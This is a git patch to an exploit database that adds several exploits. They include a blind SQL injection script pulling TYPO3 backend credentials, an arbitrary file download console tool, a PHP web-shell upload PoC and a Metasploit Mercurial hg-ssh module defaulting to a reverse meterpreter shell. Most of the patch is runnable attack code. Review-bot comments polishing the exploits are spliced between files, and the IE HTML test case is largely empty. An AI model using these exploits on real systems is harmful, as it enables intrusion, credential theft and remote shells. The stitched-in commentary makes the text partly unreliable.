From 72f98fab1ccae1b746ebdcc7bacf34622c08bbd8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 28 Apr 2017 05:01:19 +0000 Subject: [PATCH] DB: 2017-04-28 5 new exploits Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption Microsoft Office Word - Malicious Hta Execution (Metasploit) Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit) Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit) TYPO3 News Module - SQL Injection Simple File Uploader - Arbitrary File Download Easy File Uploader - Arbitrary File Upload --- files.csv | 7 +- platforms/php/webapps/41940.py | 139 +++++++++++++++++++++++++++++++ platforms/php/webapps/41943.py | 100 ++++++++++++++++++++++ platforms/php/webapps/41944.txt | 13 +++ platforms/python/remote/41942.rb | 131 +++++++++++++++++++++++++++++ platforms/windows/dos/41941.html | 77 +++++++++++++++++ 6 files changed, 466 insertions(+), 1 deletion(-) create mode 100755 platforms/php/webapps/41940.py create mode 100755 platforms/php/webapps/41943.py create mode 100755 platforms/php/webapps/41944.txt create mode 100755 platforms/python/remote/41942.rb create mode 100755 platforms/windows/dos/41941.html
diff --git a/files.csv b/files.csv
index 9d89d5072..cc2ae02c5 100644
--- a/files.csv
+++ b/files.csv
@@ -5478,6 +5478,7 @@ id,file,description,date,author,platform,type,port
 41911,platforms/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,windows,dos,0
 41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0
 41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0
+41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15470,8 +15471,9 @@ id,file,description,date,author,platform,type,port
 41903,platforms/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",windows,remote,0
 41910,platforms/linux/remote/41910.sh,"SquirrelMail < 1.4.22 - Remote Code Execution",2017-04-23,"Dawid Golunski",linux,remote,0
 41929,platforms/windows/remote/41929.py,"Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution",2017-04-25,vportal,windows,remote,0
-41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - Malicious Hta Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0
+41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0
 41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
+41942,platforms/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37789,3 +37791,6 @@ id,file,description,date,author,platform,type,port
 41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
 41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
 41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0
+41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
+41943,platforms/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps,0
+41944,platforms/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps,0
diff --git a/platforms/php/webapps/41940.py b/platforms/php/webapps/41940.py
new file mode 100755
index 000000000..93d042ffe
--- /dev/null
+++ b/platforms/php/webapps/41940.py
@@ -0,0 +1,139 @@ +# Exploit Title: TYPO3 News Module SQL Injection +# Vendor Homepage: https://typo3.org/extensions/repository/view/news +# Exploit Author: Charles FOL +# Contact: https://twitter.com/ambionics +# Website: https://www.ambionics.io/blog/typo3-news-module-sqli + + +#!/usr/bin/python3 + +# TYPO3 News Module SQL Injection Exploit +# https://www.ambionics.io/blog/typo3-news-module-sqli +# cf +# +# The injection algorithm is not optimized, this is just meant to be a POC. +# + +import requests +import string + + +session = requests.Session() +session.proxies = {'http': 'localhost:8080'} + + +# Change this +URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1' +PATTERN0 = 'Article #1' +PATTERN1 = 'Article #2' + +FULL_CHARSET = string.ascii_letters + string.digits + '$./' + + +def blind(field, table, condition, charset): + + # We add 9 so that the result has two digits + + # If the length is superior to 100-9 it won't work + + size = blind_size( + + 'length(%s)+9' % field, table, condition, + + 2, string.digits + + ) + + size = int(size) - 9 + + data = blind_size( + + field, table, condition, + + size, charset + + ) + + return data + + +def select_position(field, table, condition, position, char): + + payload = 'select(%s)from(%s)where(%s)' % ( + + field, table, condition + + ) + + payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position) + + payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % ( + + payload, ord(char) + + ) + + return payload + + +def blind_size(field, table, condition, size, charset): + + string = '' + + for position in range(size): + + for char in charset: + + payload = select_position(field, table, condition, position+1, char) + + if test(payload): + + string += char + + print(string) + + break + + else: + + raise ValueError('Char was not found') + + + + return string + + +def test(payload): + + response = session.post( + + URL, + + data=data(payload) + + ) + + response = response.text + + return response.index(PATTERN0) 
< response.index(PATTERN1) + +def data(payload): + + return { + + 'tx_news_pi1[overwriteDemand][order]': payload, + + 'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload, + + 'tx_news_pi1[search][subject]': '', + + 'tx_news_pi1[search][minimumDate]': '2016-01-01', + + 'tx_news_pi1[search][maximumDate]': '2016-12-31', + + } + +# Exploit + +print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters)) +print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET)) \ No newline at end of file diff --git a/platforms/php/webapps/41943.py b/platforms/php/webapps/41943.py new file mode 100755 index 000000000..06e2e2f82 --- /dev/null +++ b/platforms/php/webapps/41943.py 
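Review bot: `blind_size` shadows the imported `string` module with its local accumulator `string = ''`; it happens to be harmless today because the only `string.digits` use sits in `blind`, but any future reference to the module inside `blind_size` would fail with AttributeError, so rename the local (`found = ''`, `found += char`, `return found`). The `# Change this` comment covers only `URL`, `PATTERN0` and `PATTERN1`, while `session.proxies = {'http': 'localhost:8080'}` a few lines above is equally setup-specific; move the comment above the proxy assignment or extend it to `# Change this: proxy (or drop it), URL and the two page-order patterns`. `test()` compares two `str.index` results and so raises `ValueError` rather than returning False when either pattern is missing from the page; a one-line docstring stating that contract would save the next reader a surprise. `data()` would also benefit from a comment naming which of the five form fields carry the payload (`overwriteDemand[order]` and `overwriteDemand[OrderByAllowed]`) and which are fixed filler.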
@@ -0,0 +1,100 @@ +# Exploit Title: Simple File Uploader - Arbitrary File Download +# Date: 27/04/2017 +# Exploit Author: Daniel Godoy +# Vendor Homepage: https://codecanyon.net/ +# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053 +# Tested on: GNU/Linux +# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team + + + + +POC + +#!/usr/bin/env python +#https://pastebin.com/HeT7RuRU +import os,re,requests,time,base64 +os.system('clear') + +BLUE = '\033[94m' +RED = '\033[91m' +GREEN = '\033[32m' +CYAN = "\033[96m" +WHITE = "\033[97m" +YELLOW = "\033[93m" +MAGENTA = "\033[95m" +GREY = "\033[90m" +DEFAULT = "\033[0m" + +def banner(): + print WHITE+"" + print " ## ## " + print " ## ## " + print " ############## " + print " #### ###### #### " + print " ###################### " + print " ## ############## ## " + print " ## ## ## ## " + print " #### ####" + print "" + +def details(): + print WHITE+" =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 " + print "" + +def core_commands(): + os.system('clear') + print WHITE+'''Core Commands\n===============\n +Command\t\t\tDescription\n-------\t\t\t-----------\n +?\t\t\tHelp menu +quit\t\t\tExit the console +info\t\t\tDisplay information +download\t\t\tExploit Vulnerability + + ''' + +def about(): + os.system('clear') + print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n +Author\t\t\tDescription\n-------\t\t\t-----------\n +Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146 + ''' + +def download(): + other = 'a' + while other != 'n': + urltarget = str(raw_input(WHITE+'Target: ')) + filename = str(raw_input(WHITE+'FileName: ')) + filename = base64.b64encode(filename) + print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename + final = urltarget+'download.php?id='+filename + r = requests.get(final) + print r.text + other = str(raw_input(WHITE+'Test other file? 
y/n: ')) + if other == "n": + print "Type quit to exit. Bye!" + + + +banner() +details() + +option='0' +while option != 0: + option = (raw_input(RED+"pwn" + WHITE +" > ")) + if option == "quit": + os.system('clear') + option = 0 + elif option == "?": + core_commands() + elif option == "help": + core_commands() + elif option == "about": + about() + elif option == "download": + download() + elif option == "info": + about() + else: + print "Not a valid option! Need help? Press ? to display core commands " +GREEN + diff --git a/platforms/php/webapps/41944.txt b/platforms/php/webapps/41944.txt new file mode 100755 index 000000000..63fb305f7 --- /dev/null +++ b/platforms/php/webapps/41944.txt @@ -0,0 +1,13 @@ +# Exploit Title: Easy File Uploader - Arbitrary File Upload +# Date: 27/04/2017 +# Exploit Author: Daniel Godoy +# Vendor Homepage: https://codecanyon.net/ +# Software Link: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287 +# Tested on: GNU/Linux +# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team + + +POC + +Drop file php (shell.php) to upload. +access to http://poc_site/fileFolder/shell.php and enjoy! diff --git a/platforms/python/remote/41942.rb b/platforms/python/remote/41942.rb new file mode 100755 index 000000000..381a4d497 --- /dev/null +++ b/platforms/python/remote/41942.rb 
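Review bot: The tool is Python 2 only (`print WHITE+""` statements, `raw_input`) yet its shebang is `#!/usr/bin/env python` and the header says no more than `Tested on: GNU/Linux`, so on a host where `python` resolves to Python 3 every `print` statement is a SyntaxError before anything runs; pin it to `#!/usr/bin/env python2` or add `# Requires: Python 2.x` to the header. The main loop initialises `option='0'` as a string and tests `while option != 0` against an integer, relying on the `quit` branch assigning the integer `0` to terminate; `while True:` with `break` in the quit branch expresses the same control flow without the type trick. `os.system('clear')` is repeated at import time and in `core_commands`, `about` and the quit branch; a single `clear()` helper would remove the duplication. The `download()` loop prompts `Test other file? y/n:` but only `"n"` ends it, so any other reply repeats; the prompt text should say so or the check should accept `"N"` as well.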
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::SSH
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
+ 'Description' => %q{
+ This module takes advantage of custom hg-ssh wrapper implementations that don't
+ adequately validate parameters passed to the hg binary, allowing users to trigger a
+ Python Debugger session, which allows arbitrary Python code execution.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'claudijd',
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'Payload' => 'python/meterpreter/reverse_tcp',
+ },
+ 'Platform' => ['python'],
+ 'Arch' => ARCH_PYTHON,
+ 'Targets' => [ ['Automatic', {}] ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Apr 18 2017",
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Opt::RHOST(),
+ Opt::RPORT(22),
+ OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
+ OptPath.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
+ ]
+ )
+
+ register_advanced_options(
+ [
+ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+ OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+ ]
+ )
+ end
+
+ def rhost
+ datastore['RHOST']
+ end
+
+ def rport
+ datastore['RPORT']
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def ssh_priv_key
+ File.read(datastore['SSH_PRIV_KEY_FILE'])
+ end
+
+ def exploit
+ factory = ssh_socket_factory
+ ssh_options = {
+ auth_methods: ['publickey'],
+ config: false,
+ use_agent: false,
+ key_data: [ ssh_priv_key ],
+ port: rport,
+ proxy: factory,
+ non_interactive: true
+ }
+
+ ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+ print_status("#{rhost}:#{rport} - Attempting to login...")
+
+ begin
+ ssh = nil
+ ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+ ssh = Net::SSH.start(rhost, username, ssh_options)
+ end
+ rescue Rex::ConnectionError
+ return
+ rescue Net::SSH::Disconnect, ::EOFError
+ print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+ return
+ rescue ::Timeout::Error
+ print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+ return
+ rescue Net::SSH::AuthenticationFailed
+ print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
+ rescue Net::SSH::Exception => e
+ print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+ return
+ end
+
+ if ssh
+ print_good("SSH connection is established.")
+ ssh.open_channel do |ch|
+ ch.exec "hg -R --debugger serve --stdio" do |ch, success|
+ ch.on_extended_data do |ch, type, data|
+ if data.match(/entering debugger/)
+ print_good("Triggered Debugger (#{data})")
+ ch.send_data "#{payload.encoded}\n"
+ else
+ print_bad("Unable to trigger debugger (#{data})")
+ end
+ end
+ end
+ end
+
+ begin
+ ssh.loop unless session_created?
+ rescue Errno::EBADF => e
+ elog(e.message)
+ end
+ end
+ end
+end
\ No newline at end of file
diff --git a/platforms/windows/dos/41941.html b/platforms/windows/dos/41941.html
new file mode 100755
index 000000000..89497670b
--- /dev/null
+++ b/platforms/windows/dos/41941.html
@@ -0,0 +1,77 @@ + + + + + +
+ +aaaaaaaaaaaaa + + + \ No newline at end of file